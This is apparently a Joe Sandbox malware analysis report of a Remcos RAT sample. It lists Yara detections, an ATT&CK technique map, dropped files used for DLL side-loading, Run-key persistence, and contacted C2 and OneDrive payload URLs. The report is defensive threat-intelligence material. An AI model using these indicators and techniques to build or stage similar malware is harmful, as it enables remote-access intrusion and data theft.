Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\tTIYCp2sf4.exe

Code function: 0_2_028591F0 GetLocalTime,

0_2_028591F0

Source: C:\Users\user\Desktop\tTIYCp2sf4.exe

Code function: 0_2_0285B770 GetVersionExA,

0_2_0285B770

Stealing of Sensitive Information

Yara detected Remcos RAT

Source: Yara match	File source: 20.2.flhgywjG.bat.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.flhgywjG.bat.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.flhgywjG.bat.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.flhgywjG.bat.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.flhgywjG.bat.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.flhgywjG.bat.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000016.00000002.586128217.0000000000647000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.571086194.0000000000557000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.553019316.000000007EA30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.585995743.0000000000400000.00000004.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.1053880782.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.570996676.0000000000400000.00000004.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.557425300.000000007EBD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.1053773362.0000000000400000.00000004.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: tTIYCp2sf4.exe PID: 7068, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: flhgywjG.bat PID: 4028, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: flhgywjG.bat PID: 6572, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: flhgywjG.bat PID: 6888, type: MEMORYSTR

Remote Access Functionality

Yara detected Remcos RAT

Source: Yara match	File source: 20.2.flhgywjG.bat.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.flhgywjG.bat.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.flhgywjG.bat.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.flhgywjG.bat.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.flhgywjG.bat.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.flhgywjG.bat.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000016.00000002.586128217.0000000000647000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.571086194.0000000000557000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.553019316.000000007EA30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.585995743.0000000000400000.00000004.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.1053880782.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.570996676.0000000000400000.00000004.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.557425300.000000007EBD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.1053773362.0000000000400000.00000004.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: tTIYCp2sf4.exe PID: 7068, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: flhgywjG.bat PID: 4028, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: flhgywjG.bat PID: 6572, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: flhgywjG.bat PID: 6888, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
1 Valid Accounts	1 Scripting	11 DLL Side-Loading	11 DLL Side-Loading	1 Disable or Modify Tools	1 Credential API Hooking	1 System Time Discovery	Remote Services	11 Archive Collected Data	Exfiltration Over Other Network Medium	1 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	1 Native API	1 Valid Accounts	1 Valid Accounts	1 Deobfuscate/Decode Files or Information	111 Input Capture	3 File and Directory Discovery	Remote Desktop Protocol	1 Credential API Hooking	Exfiltration Over Bluetooth	1 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	1 Shared Modules	1 Registry Run Keys / Startup Folder	1 Access Token Manipulation	1 Scripting	Security Account Manager	24 System Information Discovery	SMB/Windows Admin Shares	111 Input Capture	Automated Exfiltration	1 Non-Standard Port	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	1 PowerShell	Logon Script (Mac)	412 Process Injection	2 Obfuscated Files or Information	NTDS	11 Security Software Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	2 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	1 Registry Run Keys / Startup Folder	2 Software Packing	LSA Secrets	2 Process Discovery	SSH	Keylogging	Data Transfer Size Limits	12 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Timestomp	Cached Domain Credentials	21 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	11 DLL Side-Loading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 File Deletion	Proc Filesystem	11 Remote System Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	231 Masquerading	/etc/passwd and /etc/shadow	1 System Network Configuration Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	1 Valid Accounts	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	1 Access Token Manipulation	Input Capture	Permission Groups Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop
Compromise Software Supply Chain	Unix Shell	Launchd	Launchd	21 Virtualization/Sandbox Evasion	Keylogging	Local Groups	Component Object Model and Distributed COM	Screen Capture	Exfiltration over USB	DNS			Inhibit System Recovery
Compromise Hardware Supply Chain	Visual Basic	Scheduled Task	Scheduled Task	412 Process Injection	GUI Input Capture	Domain Groups	Exploitation of Remote Services	Email Collection	Commonly Used Port	Proxy			Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
tTIYCp2sf4.exe	48%	Virustotal		Browse
tTIYCp2sf4.exe	55%	ReversingLabs	Win32.Trojan.Zusy
tTIYCp2sf4.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Windows \System32\netutils.dll	100%	Avira	TR/Starter.glbyt
C:\Users\Public\Libraries\netutils.dll	100%	Avira	TR/Starter.glbyt
C:\Users\Public\Libraries\Gjwyghlf.PIF	100%	Joe Sandbox ML
C:\Users\Public\Libraries\Gjwyghlf.PIF	55%	ReversingLabs	Win32.Trojan.Zusy
C:\Users\Public\Libraries\easinvoker.exe	0%	ReversingLabs
C:\Users\Public\Libraries\flhgywjG.bat	4%	ReversingLabs
C:\Users\Public\Libraries\netutils.dll	83%	ReversingLabs	Win64.Trojan.Barys
C:\Windows \System32\easinvoker.exe	0%	ReversingLabs
C:\Windows \System32\netutils.dll	83%	ReversingLabs	Win64.Trojan.Barys

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
geoplugin.net	1%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://geoplugin.net/json.gp	0%	URL Reputation	safe
http://geoplugin.net/json.gp/C	0%	URL Reputation	safe
www.binccoco.com	0%	Avira URL Cloud	safe
http://geoplugin.net/json.gpUse	0%	Avira URL Cloud	safe
http://geoplugin.net/json.gpA	0%	Avira URL Cloud	safe
http://geoplugin.net/json.gpV	0%	Avira URL Cloud	safe
http://geoplugin.net/json.gpu	0%	Avira URL Cloud	safe
http://www.pmail.com0	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.binccoco.com	23.172.112.72	true	true		unknown
geoplugin.net	178.237.33.50	true	false	1%, Virustotal, Browse	unknown
onedrive.live.com	unknown	unknown	false		high
ayhtnw.dm.files.1drv.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://geoplugin.net/json.gp	false	URL Reputation: safe	unknown
www.binccoco.com	true	Avira URL Cloud: safe	unknown
https://onedrive.live.com/download?resid=F253EE082321791B%21110&authkey=!AMAFiW2uLt6IzGM	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://live.com/S	Gjwyghlf.PIF, 00000015.00000002.586140973.00000000007F8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://geoplugin.net/json.gpA	flhgywjG.bat, 00000011.00000003.555823587.0000000000718000.00000004.00000020.00020000.00000000.sdmp, flhgywjG.bat, 00000011.00000002.1053931437.0000000000718000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://live.com/W	Gjwyghlf.PIF, 00000015.00000002.586140973.00000000007F8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ayhtnw.dm.files.1drv.com/y4mID53eHUXwMfKPiOplADIMqhKYXyanRMavG2yv4vnsgvX8cFZFM3kseRp0HiRXi0G	tTIYCp2sf4.exe, 00000000.00000002.553677436.0000000000706000.00000004.00000020.00020000.00000000.sdmp	false		high
http://geoplugin.net/json.gp/C	tTIYCp2sf4.exe, 00000000.00000003.553019316.000000007EA30000.00000004.00001000.00020000.00000000.sdmp, tTIYCp2sf4.exe, 00000000.00000002.557425300.000000007EBD0000.00000004.00001000.00020000.00000000.sdmp, flhgywjG.bat, 00000011.00000002.1053773362.0000000000400000.00000004.00000400.00020000.00000000.sdmp, flhgywjG.bat, 00000014.00000002.570996676.0000000000400000.00000004.00000400.00020000.00000000.sdmp, flhgywjG.bat, 00000016.00000002.585995743.0000000000400000.00000004.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ayhtnw.dm.files.1drv.com:443/y4mLRWb5d-9lXG25WT_7eBiLWY8sZ0EciysmR5ps_k7tv4ZzBCmLo9oDZ-Vt6f5	Gjwyghlf.PIF, 00000013.00000002.571116857.000000000075F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ayhtnw.dm.files.1drv.com/J	tTIYCp2sf4.exe, 00000000.00000002.553677436.0000000000706000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ayhtnw.dm.files.1drv.com/y4m6iXArnexJA3XWMqmxDU_FDhcxoLEipAhkbbHXed1HP3M9deRhNw71hrpiz4ckK7t	Gjwyghlf.PIF, 00000015.00000002.586140973.0000000000854000.00000004.00000020.00020000.00000000.sdmp, Gjwyghlf.PIF, 00000015.00000002.586140973.00000000007F8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://live.com/	tTIYCp2sf4.exe, 00000000.00000002.553677436.0000000000706000.00000004.00000020.00020000.00000000.sdmp, Gjwyghlf.PIF, 00000013.00000002.571116857.000000000075F000.00000004.00000020.00020000.00000000.sdmp, Gjwyghlf.PIF, 00000015.00000002.586140973.00000000007F8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://onhtnw.dm.files.1drv.com/	tTIYCp2sf4.exe, 00000000.00000002.553677436.000000000067A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ayhtnw.dm.files.1drv.com/y4mLRWb5d-9lXG25WT_7eBiLWY8sZ0EciysmR5ps_k7tv4ZzBCmLo9oDZ-Vt6f5KVvj	Gjwyghlf.PIF, 00000013.00000002.571116857.000000000075F000.00000004.00000020.00020000.00000000.sdmp, Gjwyghlf.PIF, 00000013.00000002.571116857.0000000000738000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ayhtnw.dm.files.1drv.com/y4m4VylKmgdBdvvrh54vLZrWMuDABvydj_FzcB4yTAcMw3yYdRWA5xBM_Xw71itRSxy	Gjwyghlf.PIF, 00000015.00000002.586140973.00000000008B7000.00000004.00000020.00020000.00000000.sdmp	false		high
http://geoplugin.net/json.gpV	flhgywjG.bat, 00000011.00000003.555823587.0000000000718000.00000004.00000020.00020000.00000000.sdmp, flhgywjG.bat, 00000011.00000002.1053931437.0000000000718000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://geoplugin.net/json.gpv	flhgywjG.bat, 00000011.00000003.555823587.0000000000740000.00000004.00000020.00020000.00000000.sdmp, flhgywjG.bat, 00000011.00000003.555974241.0000000000740000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://geoplugin.net/json.gpu	flhgywjG.bat, 00000011.00000003.555823587.0000000000718000.00000004.00000020.00020000.00000000.sdmp, flhgywjG.bat, 00000011.00000002.1053931437.0000000000718000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://geoplugin.net/json.gpUse	flhgywjG.bat, 00000011.00000002.1053880782.00000000006CA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://onedrive.live.com/download?resid=F253EE082321791B%21110&authkey=	Gjwyghlf.PIF, 00000015.00000002.586140973.00000000007F8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ayhtnw.dm.files.1drv.com/y4mLRWb5d-9lXG25WT_7eBiLWY8sZ0Eciy	Gjwyghlf.PIF, 00000013.00000002.571116857.000000000075F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ayhtnw.dm.files.1drv.com/	Gjwyghlf.PIF, 00000013.00000002.571116857.000000000075F000.00000004.00000020.00020000.00000000.sdmp, Gjwyghlf.PIF, 00000015.00000002.586140973.0000000000854000.00000004.00000020.00020000.00000000.sdmp, Gjwyghlf.PIF, 00000015.00000002.586140973.00000000007F8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://onedrive.live.com/	Gjwyghlf.PIF, 00000015.00000002.586140973.00000000007F8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.pmail.com0	tTIYCp2sf4.exe, 00000000.00000003.552419169.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp, tTIYCp2sf4.exe, 00000000.00000002.559418518.000000007FC4F000.00000004.00001000.00020000.00000000.sdmp, tTIYCp2sf4.exe, 00000000.00000002.557234330.00000000040BA000.00000004.00001000.00020000.00000000.sdmp, tTIYCp2sf4.exe, 00000000.00000002.554984890.00000000028C4000.00000004.00001000.00020000.00000000.sdmp, tTIYCp2sf4.exe, 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmp, tTIYCp2sf4.exe, 00000000.00000002.556810899.0000000003DD0000.00000004.00000020.00020000.00000000.sdmp, Gjwyghlf.PIF, 00000013.00000002.571706937.0000000002482000.00000004.00001000.00020000.00000000.sdmp, Gjwyghlf.PIF, 00000015.00000002.586811014.00000000028E2000.00000004.00001000.00020000.00000000.sdmp, flhgywjG.bat.0.dr	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
23.172.112.72	www.binccoco.com	Reserved		396502	HOTSPOTPRUS	true
178.237.33.50	geoplugin.net	Netherlands		8455	ATOM86-ASATOM86NL	false

Private

IP
127.0.0.1

General Information

Joe Sandbox Version:	38.0.0 Beryl
Analysis ID:	1285850
Start date and time:	2023-08-04 18:13:05 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 32s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	23
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	tTIYCp2sf4.exe
Original Sample Name:	cf39a14a2dc1fe5aa487b6faf19c63bc97103db670fa24c62832895e3002eca2.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@36/19@8/3
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 58.3% (good quality ratio 56.9%) Quality average: 79.7% Quality standard deviation: 24.8%
HCA Information:	Successful, ratio: 84% Number of executed functions: 32 Number of non-executed functions: 36
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240s for powershell

Warnings

Exclude process from analysis (whitelisted): audiodg.exe, WMIADAP.exe, WmiPrvSE.exe
Excluded IPs from analysis (whitelisted): 13.107.42.13, 13.107.42.12
Excluded domains from analysis (whitelisted): l-0004.l-msedge.net, odc-web-brs.onedrive.akadns.net, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, odc-dm-files-geo.onedrive.akadns.net, odc-dm-files-brs.onedrive.akadns.net, l-0003.l-msedge.net, odc-web-geo.onedrive.akadns.net, dm-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, ctldl.windowsupdate.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
18:13:57	API Interceptor	1x Sleep call for process: tTIYCp2sf4.exe modified
18:14:02	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Gjwyghlf C:\Users\Public\Gjwyghlf.url
18:14:06	API Interceptor	21x Sleep call for process: powershell.exe modified
18:14:10	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Gjwyghlf C:\Users\Public\Gjwyghlf.url
18:14:12	API Interceptor	2x Sleep call for process: Gjwyghlf.PIF modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
178.237.33.50	nuMLZVHbQf.exe	Get hash	malicious	Remcos, GuLoader	Browse	geoplugin.net/json.gp
	TDQgoQJxgC.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	AWB,_Commercial_Invoices,_Bill_of_Lading_&_Parkinglist_xls.exe	Get hash	malicious	Remcos, NSISDropper	Browse	geoplugin.net/json.gp
	SecuriteInfo.com.Trojan.Inject4.59820.23925.30290.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	SecuriteInfo.com.Win32.DropperX-gen.19020.29434.exe	Get hash	malicious	Remcos, DBatLoader	Browse	geoplugin.net/json.gp
	PO.No.660240685.doc	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	PO.No.660240685.doc	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	kO43O203k8.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	Order_no_1008875535619_PDF20230802.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	remcos.vbs	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	TT_Copy.exe	Get hash	malicious	Remcos, GuLoader	Browse	geoplugin.net/json.gp
	e50YC8LCQh.exe	Get hash	malicious	DBatLoader, Remcos	Browse	geoplugin.net/json.gp
	PO21019612.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	SU_KAM_POWER_TECHNICAL_INQUIRY.vbs	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	PURCHASE_ORDER_PRINT_REP_4100067077.doc	Get hash	malicious	DBatLoader, Remcos	Browse	geoplugin.net/json.gp
	Company_Profile_-_CHUKYO_SL_CO.,_LTD.doc	Get hash	malicious	DBatLoader, Remcos	Browse	geoplugin.net/json.gp
	RFQInvoice302.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	6480754836_AWB_20230727_411.vbs	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	NEW_PO-00211.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	RFQ_8842972123.exe	Get hash	malicious	Remcos, GuLoader	Browse	geoplugin.net/json.gp

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
geoplugin.net	nuMLZVHbQf.exe	Get hash	malicious	Remcos, GuLoader	Browse	178.237.33.50
	TDQgoQJxgC.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	AWB,_Commercial_Invoices,_Bill_of_Lading_&_Parkinglist_xls.exe	Get hash	malicious	Remcos, NSISDropper	Browse	178.237.33.50
	SecuriteInfo.com.Trojan.Inject4.59820.23925.30290.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	SecuriteInfo.com.Win32.DropperX-gen.19020.29434.exe	Get hash	malicious	Remcos, DBatLoader	Browse	178.237.33.50
	PO.No.660240685.doc	Get hash	malicious	Remcos	Browse	178.237.33.50
	PO.No.660240685.doc	Get hash	malicious	Remcos	Browse	178.237.33.50
	kO43O203k8.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	Order_no_1008875535619_PDF20230802.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	remcos.vbs	Get hash	malicious	Remcos	Browse	178.237.33.50
	TT_Copy.exe	Get hash	malicious	Remcos, GuLoader	Browse	178.237.33.50
	e50YC8LCQh.exe	Get hash	malicious	DBatLoader, Remcos	Browse	178.237.33.50
	PO21019612.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	SU_KAM_POWER_TECHNICAL_INQUIRY.vbs	Get hash	malicious	Remcos	Browse	178.237.33.50
	PURCHASE_ORDER_PRINT_REP_4100067077.doc	Get hash	malicious	DBatLoader, Remcos	Browse	178.237.33.50
	Company_Profile_-_CHUKYO_SL_CO.,_LTD.doc	Get hash	malicious	DBatLoader, Remcos	Browse	178.237.33.50
	RFQInvoice302.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	ntJoJWf6p3.exe	Get hash	malicious	Remcos, GuLoader	Browse	178.237.33.50
	6480754836_AWB_20230727_411.vbs	Get hash	malicious	Remcos	Browse	178.237.33.50
	NEW_PO-00211.exe	Get hash	malicious	Remcos	Browse	178.237.33.50

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
HOTSPOTPRUS	rxBroKIqjZ.elf	Get hash	malicious	Mirai	Browse	23.172.116.246
	6Eal54Ldsy	Get hash	malicious	Mirai	Browse	23.172.116.244
	lXp4xcNIei	Get hash	malicious	Mirai	Browse	23.172.106.92
	UyXDmGaR6G	Get hash	malicious	Mirai	Browse	23.172.116.245
ATOM86-ASATOM86NL	nuMLZVHbQf.exe	Get hash	malicious	Remcos, GuLoader	Browse	178.237.33.50
	TDQgoQJxgC.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	AWB,_Commercial_Invoices,_Bill_of_Lading_&_Parkinglist_xls.exe	Get hash	malicious	Remcos, NSISDropper	Browse	178.237.33.50
	SecuriteInfo.com.Trojan.Inject4.59820.23925.30290.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	SecuriteInfo.com.Win32.DropperX-gen.19020.29434.exe	Get hash	malicious	Remcos, DBatLoader	Browse	178.237.33.50
	PO.No.660240685.doc	Get hash	malicious	Remcos	Browse	178.237.33.50
	PO.No.660240685.doc	Get hash	malicious	Remcos	Browse	178.237.33.50
	kO43O203k8.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	Order_no_1008875535619_PDF20230802.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	remcos.vbs	Get hash	malicious	Remcos	Browse	178.237.33.50
	TT_Copy.exe	Get hash	malicious	Remcos, GuLoader	Browse	178.237.33.50
	e50YC8LCQh.exe	Get hash	malicious	DBatLoader, Remcos	Browse	178.237.33.50
	PO21019612.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	SU_KAM_POWER_TECHNICAL_INQUIRY.vbs	Get hash	malicious	Remcos	Browse	178.237.33.50
	PURCHASE_ORDER_PRINT_REP_4100067077.doc	Get hash	malicious	DBatLoader, Remcos	Browse	178.237.33.50
	Company_Profile_-_CHUKYO_SL_CO.,_LTD.doc	Get hash	malicious	DBatLoader, Remcos	Browse	178.237.33.50
	RFQInvoice302.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	ntJoJWf6p3.exe	Get hash	malicious	Remcos, GuLoader	Browse	178.237.33.50
	6480754836_AWB_20230727_411.vbs	Get hash	malicious	Remcos	Browse	178.237.33.50
	NEW_PO-00211.exe	Get hash	malicious	Remcos	Browse	178.237.33.50

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\Public\Libraries\easinvoker.exe	SecuriteInfo.com.Win32.DropperX-gen.19020.29434.exe	Get hash	malicious	Remcos, DBatLoader	Browse
	e50YC8LCQh.exe	Get hash	malicious	DBatLoader, Remcos	Browse
	PURCHASE_ORDER_PRINT_REP_4100067077.doc	Get hash	malicious	DBatLoader, Remcos	Browse
	Company_Profile_-_CHUKYO_SL_CO.,_LTD.doc	Get hash	malicious	DBatLoader, Remcos	Browse
	ShippingDoc00365483747848466448464PDF.exe	Get hash	malicious	Remcos, DBatLoader	Browse
